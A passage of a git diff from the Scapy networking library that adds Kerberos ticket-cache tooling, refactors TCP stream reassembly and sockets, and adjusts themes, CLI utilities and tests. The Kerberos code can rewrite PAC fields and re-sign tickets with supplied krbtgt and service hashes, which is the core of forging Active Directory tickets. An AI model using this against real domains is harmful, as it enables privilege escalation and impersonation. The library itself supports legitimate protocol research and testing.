"VI.LogonCount": int(self._data["LogonCount"].get()), + "VI.BadPasswordCount": int(self._data["BadPasswordCount"].get()), + "VI.UserId": int(self._data["UserId"].get()), + "VI.PrimaryGroupId": int(self._data["PrimaryGroupId"].get()), + "VI.GroupIds": [ + { + "RelativeId": int(x[0]), + "Attributes": int(x[1]), + } + for x in self._data["GroupIds"] + ], + "VI.UserFlags": int(self._data["UserFlags"].get()), + "VI.LogonDomainId": self._data["LogonDomainId"].get(), + "VI.UserAccountControl": int(self._data["UserAccountControl"].get()), + "VI.ExtraSids": [ + { + "Sid": x[0], + "Attributes": int(x[1]), + } + for x in self._data["ExtraSids"] + ], + "VI.ResourceGroupDomainSid": self._data["ResourceGroupDomainSid"].get(), + "VI.ResourceGroupIds": [ + { + "RelativeId": int(x[0]), + "Attributes": int(x[1]), + } + for x in self._data["ResourceGroupIds"] + ], + # Pac Client infos + "CI.ClientId": self._time_to_int(self._data["ClientId"].get()), + "CI.Name": self._data["Name"].get(), + # UPN DNS Info + "UPNDNS.Flags": 3, + "UPNDNS.Upn": self._data["Upn"].get(), + "UPNDNS.DnsDomainName": self._data["DnsDomainName"].get(), + "UPNDNS.SamName": self._data["SamName"].get(), + "UPNDNS.Sid": self._data["UpnDnsSid"].get(), + # Client Claims + "CC.ClaimsArrays": [ + { + "ClaimsSourceType": int(ca["ClaimsSourceType"].get()), + "ClaimEntries": [ + { + "Id": ce[0], + "Type": int(ce[1]), + "StringValues": ce[2], + } + for ce in ca["ClaimEntries"] + ], + } + for ca in self._data["ClaimsArrays"].values() + ], + # Attributes Info + "AI.Flags": "+".join( + x + for x in ["PAC_WAS_REQUESTED", "PAC_WAS_GIVEN_IMPLICITLY"] + if self._data["pacAttributes"][x].get() + ), + # Requestor + "REQ.Sid": self._data["ReqSid"].get(), + # Server Checksum + "SC.SignatureType": int(self._data["SRVSignatureType"].get()), + "SC.Signature": hex_bytes(self._data["SRVSignature"].get()), + "SC.RODCIdentifier": hex_bytes(self._data["SRVRODCIdentifier"].get()), + # KDC Checksum + "KC.SignatureType": int(self._data["KDCSignatureType"].get() or "-1"), + "KC.Signature": hex_bytes(self._data["KDCSignature"].get()), + "KC.RODCIdentifier": hex_bytes(self._data["KDCRODCIdentifier"].get()), + # Ticket Checksum + "TKT.SignatureType": int(self._data["TKTSignatureType"].get() or "-1"), + "TKT.Signature": hex_bytes(self._data["TKTSignature"].get()), + "TKT.RODCIdentifier": hex_bytes(self._data["TKTRODCIdentifier"].get()), + # Extended KDC Checksum + "EXKC.SignatureType": int(self._data["EXKDCSignatureType"].get() or "-1"), + "EXKC.Signature": hex_bytes(self._data["EXKDCSignature"].get()), + "EXKC.RODCIdentifier": hex_bytes(self._data["EXKDCRODCIdentifier"].get()), + } + tkt = self._build_ticket(store) + if hash is None and key is not None: # TODO: add key to update_ticket + hash = key.key + self.update_ticket(i, tkt, hash=hash) + + def _resign_ticket(self, tkt, spn, hash=None, kdc_hash=None): + """ + Resign a ticket (priv) + """ + # [MS-PAC] 2.8.1 - 2.8.5 + rpac = tkt.authorizationData.seq[0].adData.seq[0].adData # real pac + tmp_tkt = tkt.copy() # fake ticket and pac used for computation + pac = tmp_tkt.authorizationData.seq[0].adData.seq[0].adData + # Variables for Signatures, indexed by ulType + sig_i = {} + sig_type = {} + # Read PAC buffers to find all signatures, and set them to 0 + for k, buf in enumerate(pac.Buffers): + if buf.ulType in [0x00000006, 0x00000007, 0x00000010, 0x00000013]: + sig_i[buf.ulType] = k + sig_type[buf.ulType] = pac.Payloads[k].SignatureType + try: + pac.Payloads[k].Signature = ( + b"\x00" * _checksums[pac.Payloads[k].SignatureType].macsize + ) + except KeyError: + raise ValueError("Unknown/Unsupported signatureType") + rpac.Buffers[k].cbBufferSize = None + rpac.Buffers[k].Offset = None + + # There must at least be Server Signature and KDC Signature + if any(x not in sig_i for x in [0x00000006, 0x00000007]): + raise ValueError("Cannot sign PAC: missing a compulsory signature") + + # Build the 2 necessary keys + key_srv = self._prompt_hash( + spn, + cksumtype=sig_type[0x00000006], + hash=hash, + ) + key_kdc = self._prompt_hash( + "krbtgt/" + "@".join(spn.split("@")[1:] * 2), + cksumtype=sig_type[0x00000007], + hash=kdc_hash, + ) + + # NOTE: the doc is very unclear regarding the order of the Signatures. + + # "The extended KDC signature is a keyed hash [RFC4757] of the entire PAC + # message, with the Signature fields of all other PAC_SIGNATURE_DATA structures + # (section 2.8) set to zero." + # ==> This is wrong. + # The Ticket Signature is present when computing the Extended KDC Signature. + + # sect 2.8.3 - Ticket Signature + + if 0x00000010 in sig_i: + # "The ad-data in the PAC’s AuthorizationData element ([RFC4120] + # section 5.2.6) is replaced with a single zero byte" + tmp_tkt.authorizationData.seq[0].adData.seq[0].adData = b"\x00" + rpac.Payloads[ + sig_i[0x00000010] + ].Signature = ticket_sig = key_kdc.make_checksum( + 17, bytes(tmp_tkt) # KERB_NON_KERB_CKSUM_SALT(17) + ) + # included in the PAC when signing it for Extended Server Signature & Server Signature + pac.Payloads[sig_i[0x00000010]].Signature = ticket_sig + + # sect 2.8.4 - Extended KDC Signature + + if 0x00000013 in sig_i: + rpac.Payloads[ + sig_i[0x00000013] + ].Signature = extended_kdc_sig = key_kdc.make_checksum( + 17, bytes(pac) # KERB_NON_KERB_CKSUM_SALT(17) + ) + # included in the PAC when signing it for Server Signature + pac.Payloads[sig_i[0x00000013]].Signature = extended_kdc_sig + + # sect 2.8.1 - Server Signature + + rpac.Payloads[sig_i[0x00000006]].Signature = server_sig = key_srv.make_checksum( + 17, bytes(pac) # KERB_NON_KERB_CKSUM_SALT(17) + ) + + # sect 2.8.2 - KDC Signature + + rpac.Payloads[sig_i[0x00000007]].Signature = key_kdc.make_checksum( + 17, server_sig # KERB_NON_KERB_CKSUM_SALT(17) + ) + return tkt + + def resign_ticket(self, i, hash=None, kdc_hash=None): + """ + Resign a ticket from CCache + + :param hash: the hash to use to compute the Server Signature + :param kdc_hash: the hash to use to compute the KDC signature + (if None, not recomputed unless its a TGT where is uses hash) + """ + tkt = self.dec_ticket(i, hash=hash) + self.update_ticket(i, tkt, resign=True, hash=hash, kdc_hash=kdc_hash) + + def request_tgt(self, upn, ip=None, key=None, password=None, realm=None, **kwargs): + """ + Request a Kerberos TGT and add it to the local CCache + + See :func:`~scapy.layers.kerberos.krb_as_req` for the full documentation. + """ + res = krb_as_req(upn, ip=ip, key=key, password=password, realm=realm, **kwargs) + if not res: + return + + self.import_krb(res) + + def request_st( + self, i, spn, ip=None, renew=False, realm=None, additional_tickets=[], **kwargs + ): + """ + Request a Kerberos TS and add it to the local CCache using another ticket + + :param i: the ticket/sessionkey to use in the TGS request + + See :func:`~scapy.layers.kerberos.krb_tgs_req` for the the other parameters. + """ + ticket, sessionkey, upn, _ = self.export_krb(i) + + res = krb_tgs_req( + upn, + spn, + sessionkey=sessionkey, + ticket=ticket, + ip=ip, + renew=renew, + realm=realm, + additional_tickets=additional_tickets, + **kwargs, + ) + if not res: + return + + self.import_krb(res) + + def kpasswdset(self, i, targetupn=None): + """ + Use kpasswd in 'Set Password' mode to set the password of an account. + + :param i: the TGT to use. + """ + ticket, sessionkey, upn, _ = self.export_krb(i) + kpasswd( + upn=upn, + targetupn=targetupn, + setpassword=True, + ticket=ticket, + key=sessionkey, + ) + + def renew(self, i, ip=None, additional_tickets=[], **kwargs): + """ + Renew a Kerberos TGT or a TS from the local CCache using a TGS-REQ + + :param i: the ticket/sessionkey to renew. + """ + ticket, sessionkey, upn, spn = self.export_krb(i) + + res = krb_tgs_req( + upn, + spn, + sessionkey=sessionkey, + ticket=ticket, + ip=ip, + renew=True, + additional_tickets=additional_tickets, + **kwargs, + ) + if not res: + return + + self.import_krb(res, _inplace=i) diff --git a/scapy/packet.py b/scapy/packet.py index 37295cc8f6d..992a1a69c76 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -101,7 +101,7 @@ class Packet( "comment" ] name = None - fields_desc = [] # type: Sequence[AnyField] + fields_desc = [] # type: List[AnyField] deprecated_fields = {} # type: Dict[str, Tuple[str, str]] overload_fields = {} # type: Dict[Type[Packet], Dict[str, Any]] payload_guess = [] # type: List[Tuple[Dict[str, Any], Type[Packet]]] @@ -1430,18 +1430,29 @@ def _show_or_dump(self, ct.punct("###["), ct.layer_name(self.name), ct.punct("]###")) - for f in self.fields_desc: + fields = self.fields_desc.copy() + while fields: + f = fields.pop(0) if isinstance(f, ConditionalField) and not f._evalcond(self): continue + if hasattr(f, "fields"): # Field has subfields + s += "%s %s =\n" % ( + label_lvl + lvl, + ct.depreciate_field_name(f.name), + ) + lvl += " " * indent * self.show_indent + for i, fld in enumerate(x for x in f.fields if hasattr(self, x.name)): + fields.insert(i, fld) + continue if isinstance(f, Emph) or f in conf.emph: ncol = ct.emph_field_name vcol = ct.emph_field_value else: ncol = ct.field_name vcol = ct.field_value + pad = max(0, 10 - len(f.name)) * " " fvalue = self.getfieldval(f.name) if isinstance(fvalue, Packet) or (f.islist and f.holds_packets and isinstance(fvalue, list)): # noqa: E501 - pad = max(0, 10 - len(f.name)) * " " s += "%s %s%s%s%s\n" % (label_lvl + lvl, ct.punct("\\"), ncol(f.name), @@ -1454,7 +1465,6 @@ def _show_or_dump(self, for fvalue in fvalue_gen: s += fvalue._show_or_dump(dump=dump, indent=indent, label_lvl=label_lvl + lvl + " |", first_call=False) # noqa: E501 else: - pad = max(0, 10 - len(f.name)) * " " begn = "%s %s%s%s " % (label_lvl + lvl, ncol(f.name), pad, diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index c62ecc6901e..1c551312120 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -314,7 +314,8 @@ def _sndrcv_rcv(self, callback): store=False, opened_socket=self.rcv_pks, session=self.session, - started_callback=callback + started_callback=callback, + chainCC=self.chainCC, ) except KeyboardInterrupt: if self.chainCC: @@ -1096,6 +1097,7 @@ def _run(self, iface=None, # type: Optional[_GlobInterfaceType] started_callback=None, # type: Optional[Callable[[], Any]] session=None, # type: Optional[_GlobSessionType] + chainCC=False, # type: bool **karg # type: Any ): # type: (...) -> None @@ -1203,7 +1205,7 @@ def _run(self, if not nonblocking_socket: # select is blocking: Add special control socket from scapy.automaton import ObjectPipe - close_pipe = ObjectPipe[None]() + close_pipe = ObjectPipe[None]("control_socket") sniff_sockets[close_pipe] = "control_socket" # type: ignore def stop_cb(): @@ -1291,7 +1293,8 @@ def stop_cb(): # Only the close_pipe left del sniff_sockets[close_pipe] # type: ignore except KeyboardInterrupt: - pass + if chainCC: + raise self.running = False if opened_socket is None: for s in sniff_sockets: diff --git a/scapy/sessions.py b/scapy/sessions.py index 72856484564..46f271cc513 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -18,12 +18,14 @@ # Typing imports from typing import ( Any, + Callable, DefaultDict, Dict, Iterator, List, Optional, Tuple, + Type, cast, TYPE_CHECKING, ) @@ -75,6 +77,8 @@ def __init__(self, *args, **kwargs): def process(self, packet: Packet) -> Optional[Packet]: from scapy.layers.inet import IP, _defrag_ip_pkt + if not packet: + return None if IP not in packet: return packet return _defrag_ip_pkt(packet, self.fragments)[1] # type: ignore @@ -156,9 +160,28 @@ def __str__(self): return cast(str, self.__bytes__()) +def streamcls(cls: Type[Packet]) -> Callable[ + [bytes, Dict[str, Any], Dict[str, Any]], + Optional[Packet], +]: + """ + Wraps a class for use when dissecting streams. + """ + if hasattr(cls, "tcp_reassemble"): + return cls.tcp_reassemble # type: ignore + else: + # There is no tcp_reassemble. Just dissect the packet + return lambda data, *_: data and cls(data) + + class TCPSession(IPSession): - """A Session that matches seq/ack packets together to dissect - special protocols, such as HTTP. + """A Session that reconstructs TCP streams. + + NOTE: this has the same effect as wrapping a real socket.socket into StreamSocket, + but for all concurrent TCP streams (can be used on pcaps or sniffed sessions). + + NOTE: only protocols that implement a ``tcp_reassemble`` function will be processed + by this session. Other protocols will not be reconstructed. DEV: implement a class-function `tcp_reassemble` in your Packet class:: @@ -181,8 +204,8 @@ def tcp_reassemble(cls, data, metadata, session): https://scapy.readthedocs.io/en/latest/usage.html#how-to-use-tcpsession-to-defragment-tcp-packets :param app: Whether the socket is on application layer = has no TCP - layer. This is used for instance if you are using a native - TCP socket. Default to False + layer. This is identical to StreamSocket so only use this if your + underlying source of data isn't a socket.socket. """ def __init__(self, app=False, *args, **kwargs): @@ -232,29 +255,28 @@ def _strip_padding(self, pkt: Packet) -> Optional[bytes]: return cast(bytes, pad.load) return None - def process(self, pkt: Packet) -> Optional[Packet]: + def process(self, + pkt: Packet, + cls: Optional[Type[Packet]] = None) -> Optional[Packet]: """Process each packet: matches the TCP seq/ack numbers to follow the TCP streams, and orders the fragments. """ - _pkt = super(TCPSession, self).process(pkt) - if pkt is None: - return None - else: # Python 3.8 := would be nice - pkt = cast(Packet, _pkt) packet = None # type: Optional[Packet] if self.app: # Special mode: Application layer. Use on top of TCP - pay_class = pkt.__class__ - if hasattr(pay_class, "tcp_reassemble"): - tcp_reassemble = pay_class.tcp_reassemble - else: - # There is no tcp_reassemble. Just dissect the packet - tcp_reassemble = lambda data, *_: pay_class(data) self.data.append(bytes(pkt)) + if cls is None and not isinstance(pkt, bytes): + cls = pkt.__class__ + if "tcp_reassemble" in self.metadata: + tcp_reassemble = self.metadata["tcp_reassemble"] + elif cls is not None: + self.metadata["tcp_reassemble"] = tcp_reassemble = streamcls(cls) + else: + return None packet = tcp_reassemble( bytes(self.data), self.metadata, - self.session + self.session, ) if packet: padding = self._strip_padding(packet) @@ -268,8 +290,16 @@ def process(self, pkt: Packet) -> Optional[Packet]: return packet return None + _pkt = super(TCPSession, self).process(pkt) + if _pkt is None: + return None + else: # Python 3.8 := would be nice + pkt = _pkt + from scapy.layers.inet import IP, TCP - if not pkt or TCP not in pkt: + if not pkt: + return None + if TCP not in pkt: return pkt pay = pkt[TCP].payload if isinstance(pay, (NoPayload, conf.padding_layer)): @@ -282,14 +312,8 @@ def process(self, pkt: Packet) -> Optional[Packet]: tcp_session = self.tcp_sessions[self._get_ident(pkt, True)] # Let's guess which class is going to be used if "pay_class" not in metadata: - pay_class = pkt[TCP].guess_payload_class(new_data) - if hasattr(pay_class, "tcp_reassemble"): - tcp_reassemble = pay_class.tcp_reassemble - else: - # There is no tcp_reassemble. Just dissect the packet - tcp_reassemble = lambda data, *_: pay_class(data) - metadata["pay_class"] = pay_class - metadata["tcp_reassemble"] = tcp_reassemble + metadata["pay_class"] = pay_class = pkt[TCP].guess_payload_class(new_data) + metadata["tcp_reassemble"] = tcp_reassemble = streamcls(pay_class) else: tcp_reassemble = metadata["tcp_reassemble"] if "seq" not in metadata: @@ -352,9 +376,11 @@ def recv(self, sock: 'SuperSocket') -> Iterator[Packet]: Will be called by sniff() to ask for a packet """ pkt = sock.recv(stop_dissection_after=self.stop_dissection_after) - if not pkt: - return None # Now handle TCP reassembly - pkt = self.process(pkt) - if pkt: - yield pkt + while pkt is not None: + pkt = self.process(pkt) + if pkt: + yield pkt + # keep calling process as there might be more + pkt = b"" # type: ignore + return None diff --git a/scapy/supersocket.py b/scapy/supersocket.py index caf8b0e23b9..a62742e2c2b 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -26,7 +26,7 @@ from scapy.compat import raw from scapy.error import warning, log_runtime from scapy.interfaces import network_name -from scapy.packet import Packet +from scapy.packet import Packet, NoPayload import scapy.packet from scapy.plist import ( PacketList, @@ -39,6 +39,7 @@ from scapy.interfaces import _GlobInterfaceType from typing import ( Any, + Dict, Iterator, List, Optional, @@ -214,8 +215,7 @@ def close(self): def sr(self, *args, **kargs): # type: (Any, Any) -> Tuple[SndRcvList, PacketList] from scapy import sendrecv - ans, unans = sendrecv.sndrcv(self, *args, **kargs) - return ans, unans + return sendrecv.sndrcv(self, *args, **kargs) def sr1(self, *args, **kargs): # type: (Any, Any) -> Optional[Packet] @@ -230,8 +230,7 @@ def sr1(self, *args, **kargs): def sniff(self, *args, **kargs): # type: (Any, Any) -> PacketList from scapy import sendrecv - pkts = sendrecv.sniff(opened_socket=self, *args, **kargs) # type: PacketList # noqa: E501 - return pkts + return sendrecv.sniff(opened_socket=self, *args, **kargs) def tshark(self, *args, **kargs): # type: (Any, Any) -> None @@ -401,37 +400,63 @@ class SimpleSocket(SuperSocket): desc = "wrapper around a classic socket" __selectable_force_select__ = True - def __init__(self, sock): - # type: (socket.socket) -> None + def __init__(self, sock, basecls=None): + # type: (socket.socket, Optional[Type[Packet]]) -> None self.ins = sock self.outs = sock + if basecls is None: + basecls = conf.raw_layer + self.basecls = basecls + + def recv_raw(self, x=MTU): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] + return self.basecls, self.ins.recv(x), None class StreamSocket(SimpleSocket): + """ + Wrap a stream socket into a layer 2 SuperSocket + + :param sock: the socket to wrap + :param basecls: the base class packet to use to dissect the packet + """ desc = "transforms a stream socket into a layer 2" - nonblocking_socket = True - def __init__(self, sock, basecls=None): - # type: (socket.socket, Optional[Type[Packet]]) -> None - if basecls is None: - basecls = conf.raw_layer - SimpleSocket.__init__(self, sock) - self.basecls = basecls + def __init__(self, + sock, # type: socket.socket + basecls=None, # type: Optional[Type[Packet]] + ): + # type: (...) -> None + from scapy.sessions import streamcls + self.rcvcls = streamcls(basecls or conf.raw_layer) + self.metadata: Dict[str, Any] = {} + self.streamsession: Dict[str, Any] = {} + self.MTU = MTU + super(StreamSocket, self).__init__(sock, basecls=basecls) - def recv(self, x=MTU, **kwargs): - # type: (int, **Any) -> Optional[Packet] + def recv(self, x=None, **kwargs): + # type: (Optional[int], Any) -> Optional[Packet] + if x is None: + x = self.MTU + # Block but in PEEK mode data = self.ins.recv(x, socket.MSG_PEEK) + if data == b"": + raise EOFError x = len(data) - if x == 0: + pkt = self.rcvcls(data, self.metadata, self.streamsession) + if pkt is None: # Incomplete packet. + if len(data) == self.MTU: # Bigger than MTU. Increase + self.MTU *= 2 return None - pkt = self.basecls(data, **kwargs) # type: Packet + self.metadata.clear() + # Strip any madding pad = pkt.getlayer(conf.padding_layer) if pad is not None and pad.underlayer is not None: del pad.underlayer.payload - from scapy.packet import NoPayload while pad is not None and not isinstance(pad, NoPayload): x -= len(pad.load) pad = pad.payload + # Only receive the packet length self.ins.recv(x) return pkt @@ -445,8 +470,10 @@ def __init__(self, sock, basecls=None): super(SSLStreamSocket, self).__init__(sock, basecls) # 65535, the default value of x is the maximum length of a TLS record - def recv(self, x=65535, **kwargs): - # type: (int, **Any) -> Optional[Packet] + def recv(self, x=None, **kwargs): + # type: (Optional[int], **Any) -> Optional[Packet] + if x is None: + x = MTU pkt = None # type: Optional[Packet] if self._buf != b"": try: diff --git a/scapy/themes.py b/scapy/themes.py index a30c179a2c2..61a295fd185 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -34,7 +34,8 @@ class ColorTable: "blue": ("\033[34m", "#ansiblue"), "purple": ("\033[35m", "#ansipurple"), "cyan": ("\033[36m", "#ansicyan"), - "grey": ("\033[37m", "#ansiwhite"), + "white": ("\033[37m", "#ansiwhite"), + "grey": ("\033[38;5;246m", "#ansiwhite"), "reset": ("\033[39m", "noinherit"), # background "bg_black": ("\033[40m", "bg:#ansiblack"), @@ -44,7 +45,7 @@ class ColorTable: "bg_blue": ("\033[44m", "bg:#ansiblue"), "bg_purple": ("\033[45m", "bg:#ansipurple"), "bg_cyan": ("\033[46m", "bg:#ansicyan"), - "bg_grey": ("\033[47m", "bg:#ansiwhite"), + "bg_white": ("\033[47m", "bg:#ansiwhite"), "bg_reset": ("\033[49m", "noinherit"), # specials "normal": ("\033[0m", "noinherit"), # color & brightness @@ -116,6 +117,7 @@ class ColorTheme: style_field_value = "" style_emph_field_name = "" style_emph_field_value = "" + style_depreciate_field_name = "" style_packetlist_name = "" style_packetlist_proto = "" style_packetlist_value = "" @@ -183,7 +185,8 @@ class DefaultTheme(AnsiColorTheme): style_prompt = Color.blue + Color.bold style_punct = Color.normal style_id = Color.blue + Color.bold - style_not_printable = Color.grey + style_not_printable = Color.white + style_depreciate_field_name = Color.grey style_layer_name = Color.red + Color.bold style_field_name = Color.blue style_field_value = Color.purple @@ -198,7 +201,7 @@ class DefaultTheme(AnsiColorTheme): style_odd = Color.black style_opening = Color.yellow style_active = Color.black - style_closed = Color.grey + style_closed = Color.white style_left = Color.blue + Color.invert style_right = Color.red + Color.invert style_logo = Color.green + Color.bold @@ -266,9 +269,9 @@ class ColorOnBlackTheme(AnsiColorTheme): style_fail = Color.red + Color.bold style_success = Color.green style_even = Color.black + Color.bold - style_odd = Color.grey + style_odd = Color.white style_opening = Color.yellow - style_active = Color.grey + Color.bold + style_active = Color.white + Color.bold style_closed = Color.black + Color.bold style_left = Color.cyan + Color.bold style_right = Color.red + Color.bold diff --git a/scapy/utils.py b/scapy/utils.py index 5720ed90e10..5e8f9457573 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -9,15 +9,17 @@ from decimal import Decimal +from io import StringIO +from itertools import zip_longest import array import collections import decimal import difflib import gzip -from io import StringIO -from itertools import zip_longest +import inspect import locale +import math import os import pickle import random @@ -30,6 +32,7 @@ import tempfile import threading import time +import traceback import warnings from scapy.config import conf @@ -69,12 +72,16 @@ Union, overload, ) -from scapy.compat import Literal +from scapy.compat import ( + DecoratorCallable, + Literal, +) if TYPE_CHECKING: from scapy.packet import Packet from scapy.plist import _PacketIterable, PacketList from scapy.supersocket import SuperSocket + import prompt_toolkit _ByteStream = Union[IO[bytes], gzip.GzipFile] @@ -735,7 +742,7 @@ def atol(x): try: ip = inet_aton(x) except socket.error: - ip = inet_aton(socket.gethostbyname(x)) + raise ValueError("Bad IP format: %s" % x) return cast(int, struct.unpack("!I", ip)[0]) @@ -773,10 +780,7 @@ def valid_ip6(addr): try: inet_pton(socket.AF_INET6, addr) except socket.error: - try: - socket.getaddrinfo(addr, None, socket.AF_INET6)[0][4][0] - except socket.error: - return False + return False return True @@ -3086,6 +3090,20 @@ def pretty_list(rtlst, # type: List[Tuple[Union[str, List[str]], ...]] return "\n".join(fmt % x for x in rtslst) +def human_size(x, fmt=".1f"): + # type: (int, str) -> str + """ + Convert a size in octets to a human string representation + """ + units = ['K', 'M', 'G', 'T', 'P', 'E'] + if not x: + return "0B" + i = int(math.log(x, 2**10)) + if i and i < len(units): + return format(x / 2**(10 * i), fmt) + units[i - 1] + return str(x) + "B" + + def __make_table( yfmtfunc, # type: Callable[[int], str] fmtfunc, # type: Callable[[int], str] @@ -3237,6 +3255,189 @@ def whois(ip_address): break return b"\n".join(lines[3:]) +#################### +# CLI utils # +#################### + + +class CLIUtil: + """ + Provides a Util class to easily create simple CLI tools in Scapy, + that can still be used as an API. + + Doc: + - override the ps1() function + - register commands with the @CLIUtil.addcomment decorator + - call the loop() function when ready + """ + + def _depcheck(self) -> None: + """ + Check that all dependencies are installed + """ + try: + import prompt_toolkit # noqa: F401 + except ImportError: + # okay we lie but prompt_toolkit is a dependency... + raise ImportError("You need to have IPython installed to use the CLI") + + # Okay let's do nice code + commands: Dict[str, Callable[..., Any]] = {} + # print output of command + commands_output: Dict[str, Callable[..., str]] = {} + # provides completion to command + commands_complete: Dict[str, Callable[..., List[str]]] = {} + + @classmethod + def addcommand(cls, spaces: bool = False) -> Callable[[DecoratorCallable], DecoratorCallable]: # noqa: E501 + """ + Decorator to register a command + """ + def func(cmd: DecoratorCallable) -> DecoratorCallable: + cls.commands[cmd.__name__] = cmd + cmd._spaces = spaces # type: ignore + return cmd + return func + + @classmethod + def addoutput(cls, cmd: DecoratorCallable) -> Callable[[DecoratorCallable], DecoratorCallable]: # noqa: E501 + """ + Decorator to register a command output processor + """ + def func(processor: DecoratorCallable) -> DecoratorCallable: + cls.commands_output[cmd.__name__] = processor + return processor + return func + + @classmethod + def addcomplete(cls, cmd: DecoratorCallable) -> Callable[[DecoratorCallable], DecoratorCallable]: # noqa: E501 + """ + Decorator to register a command completor + """ + def func(processor: DecoratorCallable) -> DecoratorCallable: + cls.commands_complete[cmd.__name__] = processor + return processor + return func + + def ps1(self) -> str: + """ + Return the PS1 of the shell + """ + return "> " + + def close(self) -> None: + """ + Function called on exiting + """ + print("Exited") + + def help(self, cmd: Optional[str] = None) -> None: + """ + Return the help related to this CLI util + """ + def _args(func: Any) -> str: + return " %s" % " ".join( + "<%s>" % x + for x in list(inspect.signature(func).parameters.values())[1:] + ) + + if cmd is not None: + # help for one command + func = self.commands[cmd] + print("%s%s: %s" % ( + cmd, + _args(func), + func.__doc__ and func.__doc__.strip() + )) + else: + header = "# %s - Help #" % self.__class__.__name__ + print("#" * (len(header))) + print(header) + print("#" * (len(header))) + for cmd, func in self.commands.items(): + print("%s%s: %s" % ( + cmd, + _args(func), + func.__doc__ and func.__doc__.strip().split("\n")[0] + )) + + def _completer(self) -> 'prompt_toolkit.completion.Completer': + """ + Returns a prompt_toolkit custom completer + """ + from prompt_toolkit.completion import Completer, Completion + + class CLICompleter(Completer): + def get_completions(cmpl, document, complete_event): # type: ignore + if not complete_event.completion_requested: + # Only activate when the user does + return + parts = document.text.split(" ", 1) + cmd = parts[0].lower() + if cmd not in self.commands: + # We are trying to complete the command + for possible_cmd in (x for x in self.commands if x.startswith(cmd)): + yield Completion(possible_cmd, start_position=-len(cmd)) + else: + # We are trying to complete the command content + if len(parts) == 1: + return + arg = parts[1] + if cmd in self.commands_complete: + for possible_arg in self.commands_complete[cmd](self, arg): + yield Completion(possible_arg, start_position=-len(arg)) + return + return CLICompleter() + + def loop(self, debug: int = 0) -> None: + """ + Main command handling loop + """ + from prompt_toolkit import PromptSession + session = PromptSession(completer=self._completer()) + + while True: + try: + cmd = session.prompt(self.ps1()).strip() + except KeyboardInterrupt: + continue + except EOFError: + self.close() + break + args = cmd.split(" ")[1:] + cmd = cmd.split(" ")[0].strip().lower() + if not cmd: + continue + if cmd in ["help", "h", "?"]: + self.help() + continue + if cmd in "exit": + break + if cmd not in self.commands: + print("Unknown command. Type help or ?") + else: + # check the number of arguments + func = self.commands[cmd] + if func._spaces: # type: ignore + args = [" ".join(args)] + res = None + try: + res = func(self, *args) + except TypeError: + print("Bad number of arguments !") + self.help(cmd=cmd) + continue + except Exception as ex: + print("Command failed with error: %s" % ex) + if debug > 1: + traceback.print_exception(ex) + try: + if res and cmd in self.commands_output: + self.commands_output[cmd](self, res) + except Exception as ex: + print("Output processor failed with error: %s" % ex) + + ####################### # PERIODIC SENDER # ####################### diff --git a/test/configs/cryptography.utsc b/test/configs/cryptography.utsc index 894e23977d1..f8635694076 100644 --- a/test/configs/cryptography.utsc +++ b/test/configs/cryptography.utsc @@ -3,6 +3,7 @@ "test/scapy/layers/tls/tls*.uts", "test/scapy/layers/dot11.uts", "test/scapy/layers/ipsec.uts", + "test/scapy/layers/kerberos.uts", "test/contrib/macsec.uts" ], "breakfailed": true, diff --git a/test/pcaps/dcerpc_msnrpc.pcapng.gz b/test/pcaps/dcerpc_msnrpc.pcapng.gz new file mode 100644 index 0000000000000000000000000000000000000000..cd8b45a4bb1b2e2388fcf2426eb9b7848aab04a5 GIT binary patch literal 1039 zcmV+q1n~PGiwFoIV7X)f17u@ma&Ti`ZF6pNaARL?Wpr|EZ)b0Ab75_4Z)b0AcWHEJ zW^7?+b1raWVQ_9|0IiivOcOyE$G>f9ty)wlQL-U%5=Gh|ebE+05>Y^kRD%d=P=hUP zV11NzX)6-rBa&b=zKBObG#-2$)aU^*CI*SpM$~v9#*3O5XE zkIHK5Q7N*Uoz_Zs2QuyvLM>?h`U;2HZURulJn#s?a659EZBDbbz_FyDIS>p;LKCDx zF_edQiA`P+88-@2psmF#?J%K2v&(Ep#!4ZCBC;)dn|64c1AgRflb;q4-=q;5DqZ&+7ZCCj48E9Q~LR%{ccC-<#v!rlM>67~dHM-?Sd_p@eNo=EGz%CFS#5 zDoWv?w*DhwBaF}$+fLZ>24->D+ciG_(~u$2lisI>VUa3MRw* z{NZQVewIqJA=h21nPH-4v$*RkN3=w<2v3-RGM!b#C+8?(CmP|XW?cgYNN?ZZ$aG|m zT>S*xf{NxR-#EGiKln2P74<(;9;V@;3!jv<6hX!`pw~Fd+07+#9=&fLUWDhQC+`E7 zZCOS4!8LIoMzlEZ9=s2RNRY6rXwIKm&d(>upxkK+Tg~SGONT){)q&vtKcDJ^Pq`8O zlIzXV%S9)zH^VSFJ2$qBot@s$pnmjxMkUWz|N7f{`!j`qskap$G|?&QZ8hEJw`2P} zsP7FCHq3Z(s(S0>NhHToSCQ*4>+O_+Y3RqXsEBPbm1aIejB3`Bq}fTH_bj8D^(X4B z7?kxUpD+!Zk#Qqb!CJ6k%VsZhI9)|cPBET+3Z6!xJKBKlhEy7PEY(z_9}_k5EW=Du zs?mi+Ei7a_dgi@hw`HjOXKj@{+s9(xQpEoDcz3KD+uf9|w~001I%1&06t literal 0 HcmV?d00001 diff --git a/test/regression.uts b/test/regression.uts index 3d0e3bd92b5..b52aad92800 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1071,7 +1071,8 @@ scapy_delete_temp_files() = Test utility functions - network related ~ netaccess -atol("www.secdev.org") == 3642339845 +assert atol("1.1.1.1") == 0x1010101 +assert atol("192.168.0.1") == 0xc0a80001 = Test autorun functions ~ autorun @@ -1668,7 +1669,7 @@ finally: # simulate sniffing on multiple interfaces. def _test(): - iface = conf.route.route("www.google.com")[0] + iface = conf.route.route(str(Net("www.google.com")))[0] port = int(RandShort()) pkt = IP(dst="www.google.com")/TCP(sport=port, dport=80, flags="S") def cb(): @@ -3584,8 +3585,7 @@ class DNSTCP(Packet): fields_desc = [ FieldLenField("len", None, fmt="!H", length_of="dns"), PacketLenField("dns", 0, DNS, length_from=lambda p: p.len)] -ssck = 